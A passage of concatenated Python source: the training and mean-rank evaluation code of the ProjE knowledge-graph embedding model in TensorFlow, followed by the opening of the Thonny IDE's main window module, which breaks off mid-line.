self.__trainable.append(self.__hr_combination_matrix)
self.__trainable.append(self.__tr_combination_matrix)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
@staticmethod
def __l1_normalize(x, dim, epsilon=1e-12, name=None):
square_sum = tf.reduce_sum(tf.abs(x), [dim], keep_dims=True)
x_inv_norm = tf.rsqrt(tf.maximum(square_sum, epsilon))
return tf.mul(x, x_inv_norm, name=name)
@staticmethod
def sampled_softmax(tensor, weights):
max_val = tf.reduce_max(tensor * tf.abs(weights), 1, keep_dims=True)
tensor_rescaled = tensor - max_val
tensor_exp = tf.exp(tensor_rescaled)
tensor_sum = tf.reduce_sum(tensor_exp * tf.abs(weights), 1, keep_dims=True)
return (tensor_exp / tensor_sum) * tf.abs(weights) # all ignored elements will have a prob of 0.
def train(self, inputs, regularizer_weight=1., scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
if self.__initialized:
scp.reuse_variables()
rel_embedding = self.__rel_embedding
normalized_ent_embedding = self.__ent_embedding
hr_tlist, hr_tlist_weight, tr_hlist, tr_hlist_weight = inputs
# (?, dim)
hr_tlist_h = tf.nn.embedding_lookup(normalized_ent_embedding, hr_tlist[:, 0])
hr_tlist_r = tf.nn.embedding_lookup(rel_embedding, hr_tlist[:, 1])
# (?, dim)
tr_hlist_t = tf.nn.embedding_lookup(normalized_ent_embedding, tr_hlist[:, 0])
tr_hlist_r = tf.nn.embedding_lookup(rel_embedding, tr_hlist[:, 1])
if self.__combination_method.lower() == 'simple':
# shape (?, dim)
hr_tlist_hr = hr_tlist_h * self.__hr_weighted_vector[
:self.__embed_dim] + hr_tlist_r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.nn.dropout(tf.tanh(hr_tlist_hr + self.__hr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
tr_hlist_tr = tr_hlist_t * self.__tr_weighted_vector[
:self.__embed_dim] + tr_hlist_r * self.__tr_weighted_vector[
self.__embed_dim:]
trh_res = tf.matmul(tf.nn.dropout(tf.tanh(tr_hlist_tr + self.__tr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_weighted_vector)) + tf.reduce_sum(tf.abs(
self.__tr_weighted_vector)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
else:
hr_tlist_hr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [hr_tlist_h, hr_tlist_r]),
self.__hr_combination_matrix) + self.__hr_combination_bias),
self.__dropout)
hrt_res = tf.matmul(hr_tlist_hr, self.__ent_embedding, transpose_b=True)
tr_hlist_tr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [tr_hlist_t, tr_hlist_r]),
self.__tr_combination_matrix) + self.__tr_combination_bias),
self.__dropout)
trh_res = tf.matmul(tr_hlist_tr, self.__ent_embedding, transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_combination_matrix)) + tf.reduce_sum(tf.abs(
self.__tr_combination_matrix)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
self.hrt_softmax = hrt_res_softmax = self.sampled_softmax(hrt_res, hr_tlist_weight)
hrt_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(hrt_res_softmax, 1e-10, 1.0)) * tf.maximum(0.,
hr_tlist_weight) / tf.reduce_sum(
tf.maximum(0., hr_tlist_weight), 1, keep_dims=True))
self.trh_softmax = trh_res_softmax = self.sampled_softmax(trh_res, tr_hlist_weight)
trh_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(trh_res_softmax, 1e-10, 1.0)) * tf.maximum(0., tr_hlist_weight) / tf.reduce_sum(
tf.maximum(0., tr_hlist_weight), 1, keep_dims=True))
return hrt_loss + trh_loss + regularizer_loss * regularizer_weight
def test(self, inputs, scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
scp.reuse_variables()
h = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 0])
t = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 1])
r = tf.nn.embedding_lookup(self.__rel_embedding, inputs[:, 2])
ent_mat = tf.transpose(self.__ent_embedding)
if self.__combination_method.lower() == 'simple':
# predict tails
hr = h * self.__hr_weighted_vector[:self.__embed_dim] + r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat)
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
# predict heads
tr = t * self.__tr_weighted_vector[:self.__embed_dim] + r * self.__tr_weighted_vector[self.__embed_dim:]
trh_res = tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat)
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
else:
hr = tf.matmul(tf.concat(1, [h, r]), self.__hr_combination_matrix)
hrt_res = (tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
tr = tf.matmul(tf.concat(1, [t, r]), self.__tr_combination_matrix)
trh_res = (tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
return head_ids, tail_ids
def train_ops(model: ProjE, learning_rate=0.1, optimizer_str='gradient', regularizer_weight=1.0):
with tf.device('/cpu'):
train_hrt_input = tf.placeholder(tf.int32, [None, 2])
train_hrt_weight = tf.placeholder(tf.float32, [None, model.n_entity])
train_trh_input = tf.placeholder(tf.int32, [None, 2])
train_trh_weight = tf.placeholder(tf.float32, [None, model.n_entity])
loss = model.train([train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight],
regularizer_weight=regularizer_weight)
if optimizer_str == 'gradient':
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'rms':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
else:
raise NotImplementedError("Does not support %s optimizer" % optimizer_str)
grads = optimizer.compute_gradients(loss, model.trainable_variables)
op_train = optimizer.apply_gradients(grads)
return train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, loss, op_train
def test_ops(model: ProjE):
with tf.device('/cpu'):
test_input = tf.placeholder(tf.int32, [None, 3])
head_ids, tail_ids = model.test(test_input)
return test_input, head_ids, tail_ids
def worker_func(in_queue: JoinableQueue, out_queue: Queue, hr_t, tr_h):
while True:
dat = in_queue.get()
if dat is None:
in_queue.task_done()
continue
testing_data, head_pred, tail_pred = dat
out_queue.put(test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h))
in_queue.task_done()
def data_generator_func(in_queue: JoinableQueue, out_queue: Queue, tr_h, hr_t, n_entity, neg_weight):
while True:
dat = in_queue.get()
if dat is None:
break
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
htr = dat
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in tr_h[htr[idx, 1]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in hr_t[htr[idx, 0]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
out_queue.put((np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32),
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)))
def test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h):
assert len(testing_data) == len(head_pred)
assert len(testing_data) == len(tail_pred)
mean_rank_h = list()
mean_rank_t = list()
filtered_mean_rank_h = list()
filtered_mean_rank_t = list()
for i in range(len(testing_data)):
h = testing_data[i, 0]
t = testing_data[i, 1]
r = testing_data[i, 2]
# mean rank
mr = 0
for val in head_pred[i]:
if val == h:
mean_rank_h.append(mr)
break
mr += 1
mr = 0
for val in tail_pred[i]:
if val == t:
mean_rank_t.append(mr)
mr += 1
# filtered mean rank
fmr = 0
for val in head_pred[i]:
if val == h:
filtered_mean_rank_h.append(fmr)
break
if t in tr_h and r in tr_h[t] and val in tr_h[t][r]:
continue
else:
fmr += 1
fmr = 0
for val in tail_pred[i]:
if val == t:
filtered_mean_rank_t.append(fmr)
break
if h in hr_t and r in hr_t[h] and val in hr_t[h][r]:
continue
else:
fmr += 1
return (mean_rank_h, filtered_mean_rank_h), (mean_rank_t, filtered_mean_rank_t)
def main(_):
parser = argparse.ArgumentParser(description='ProjE.')
parser.add_argument('--data', dest='data_dir', type=str, help="Data folder", default='./data/FB15k/')
parser.add_argument('--lr', dest='lr', type=float, help="Learning rate", default=0.01)
parser.add_argument("--dim", dest='dim', type=int, help="Embedding dimension", default=200)
parser.add_argument("--batch", dest='batch', type=int, help="Batch size", default=100)
parser.add_argument("--comb", dest="combination_method", type=str, help="Combination method", default='simple')
parser.add_argument("--worker", dest='n_worker', type=int, help="Evaluation worker", default=3)
parser.add_argument("--generator", dest='n_generator', type=int, help="Data generator", default=10)
parser.add_argument("--eval_batch", dest="eval_batch", type=int, help="Evaluation batch size", default=500)
parser.add_argument("--save_dir", dest='save_dir', type=str, help="Model path", default='./')
parser.add_argument("--load_model", dest='load_model', type=str, help="Model file", default="")
parser.add_argument("--save_per", dest='save_per', type=int, help="Save per x iteration", default=10)
parser.add_argument("--eval_per", dest='eval_per', type=int, help="Evaluate every x iteration", default=1)
parser.add_argument("--max_iter", dest='max_iter', type=int, help="Max iteration", default=100)
parser.add_argument("--summary_dir", dest='summary_dir', type=str, help="summary directory",
default='./ProjE_summary/')
parser.add_argument("--keep", dest='drop_out', type=float, help="Keep prob (1.0 keep all, 0. drop all)",
default=0.5)
parser.add_argument("--optimizer", dest='optimizer', type=str, help="Optimizer", default='adam')
parser.add_argument("--prefix", dest='prefix', type=str, help="model_prefix", default='DEFAULT')
parser.add_argument("--loss_weight", dest='loss_weight', type=float, help="Weight on parameter loss", default=1e-5)
parser.add_argument("--neg_weight", dest='neg_weight', type=float, help="Sampling weight on negative examples",
default=0.5)
args = parser.parse_args()
print(args)
model = ProjE(args.data_dir, embed_dim=args.dim, combination_method=args.combination_method,
dropout=args.drop_out, neg_weight=args.neg_weight)
train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, \
train_loss, train_op = train_ops(model, learning_rate=args.lr,
optimizer_str=args.optimizer,
regularizer_weight=args.loss_weight)
test_input, test_head, test_tail = test_ops(model)
with tf.Session() as session:
tf.initialize_all_variables().run()
saver = tf.train.Saver()
iter_offset = 0
if args.load_model is not None and os.path.exists(args.load_model):
saver.restore(session, args.load_model)
iter_offset = int(args.load_model.split('.')[-2].split('_')[-1]) + 1
print("Load model from %s, iteration %d restored." % (args.load_model, iter_offset))
total_inst = model.n_train
# training data generator
raw_training_data_queue = Queue()
training_data_queue = Queue()
data_generators = list()
for i in range(args.n_generator):
data_generators.append(Process(target=data_generator_func, args=(
raw_training_data_queue, training_data_queue, model.tr_h, model.hr_t, model.n_entity, args.neg_weight)))
data_generators[-1].start()
evaluation_queue = JoinableQueue()
result_queue = Queue()
for i in range(args.n_worker):
worker = Process(target=worker_func, args=(evaluation_queue, result_queue, model.hr_t, model.tr_h))
worker.start()
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] INITIALIZATION [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] INITIALIZATION [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
for n_iter in range(iter_offset, args.max_iter):
start_time = timeit.default_timer()
accu_loss = 0.
accu_re_loss = 0.
ninst = 0
print("initializing raw training data...")
nbatches_count = 0
for dat in model.raw_training_data(batch_size=args.batch):
raw_training_data_queue.put(dat)
nbatches_count += 1
print("raw training data initialized.")
while nbatches_count > 0:
nbatches_count -= 1
hr_tlist, hr_tweight, tr_hlist, tr_hweight = training_data_queue.get()
l, rl, _ = session.run(
[train_loss, model.regularizer_loss, train_op], {train_hrt_input: hr_tlist,
train_hrt_weight: hr_tweight,
train_trh_input: tr_hlist,
train_trh_weight: tr_hweight})
accu_loss += l
accu_re_loss += rl
ninst += len(hr_tlist) + len(tr_hlist)
if ninst % (5000) is not None:
print(
'[%d sec](%d/%d) : %.2f -- loss : %.5f rloss: %.5f ' % (
timeit.default_timer() - start_time, ninst, total_inst, float(ninst) / total_inst,
l / (len(hr_tlist) + len(tr_hlist)),
args.loss_weight * (rl / (len(hr_tlist) + len(tr_hlist)))),
end='\r')
print("")
print("iter %d avg loss %.5f, time %.3f" % (n_iter, accu_loss / ninst, timeit.default_timer() - start_time))
if n_iter % args.save_per == 0 or n_iter == args.max_iter - 1:
save_path = saver.save(session,
os.path.join(args.save_dir,
"ProjE_" + str(args.prefix) + "_" + str(n_iter) + ".ckpt"))
print("Model saved at %s" % save_path)
if n_iter % args.eval_per == 0 or n_iter == args.max_iter - 1:
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] ITER %d [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] ITER %d [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
if __name__ == '__main__':
tf.app.run()
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.plugins.microbit import MicrobitFlashingDialog
from thonny.plugins.micropython.uf2dialog import Uf2FlashingDialog
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._tweak_environment()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("general.environment", [])
self.set_default("file.avoid_zenity", False)
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def _tweak_environment(self):
for entry in self.get_option("general.environment"):
if "=" in entry:
key, val = entry.split("=", maxsplit=1)
os.environ[key] = os.path.expandvars(val)
else:
logger.warning("No '=' in environment entry '%s'", entry)
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_statusbar(self):
self._statusbar = ttk.Frame(self)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
